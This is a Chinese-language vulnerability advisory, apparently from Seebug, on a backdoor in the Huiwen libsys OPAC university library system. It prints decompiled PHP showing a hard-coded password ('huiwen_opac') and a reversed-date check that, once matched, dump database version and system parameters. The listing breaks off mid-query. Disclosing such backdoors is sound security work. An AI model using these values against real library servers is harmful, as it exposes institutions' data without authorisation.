汇文opac图书馆后门导致源码泄漏

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

#### 0x00 介绍 汇文的libsys图书馆opac系统是高校使用得比较多的系统,用户有厦大,南京大学,大连理工,南开大学等多所学校。系统使用的是Oracle+php,无法从公开触到获取源码。 #### 0x01 获取代码 在汇文图书馆的官网上,可以下载到一些补丁,如截图所示。 ![](https://images.seebug.org/1494564589626-w331s) 下载OPAC重要安全BUG更新,可以看到一部分php文件,php使用了DeZend加密,可以使用工具解密,其中,/opac/ajax_libsys_view.php文件代码如下所示 ```php <?php /*********************/ /* */ /* Dezend for PHP5 */ /* NWS */ /* Nulled.WS */ /* */ /*********************/ require_once( "common.php" ); require_once( "../include/hwopacpwd.php" ); $pwd = $_REQUEST['code']; $crc = $_REQUEST['crc']; $date = strrev( date( "md" ) ); if ( $pwd != "huiwen_opac" || $date != $crc ) { echo "ERROR"; return; } $ary = array( ); $strSql = " SELECT * from v\$version "; $stmt = $dbh->prepare( $strSql ); $stmt->execute( ); $mode = OCI_FETCHSTATEMENT_BY_ROW; $version = $stmt->fetchall( $mode ); $i = 0; for ( ;$i < count( $version );++$i) { $ary[] = array( "or" => $version[$i]['BANNER'] ); } $strSql = "SELECT sys_para_code,sys_para_value FROM sys_comm_para where...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息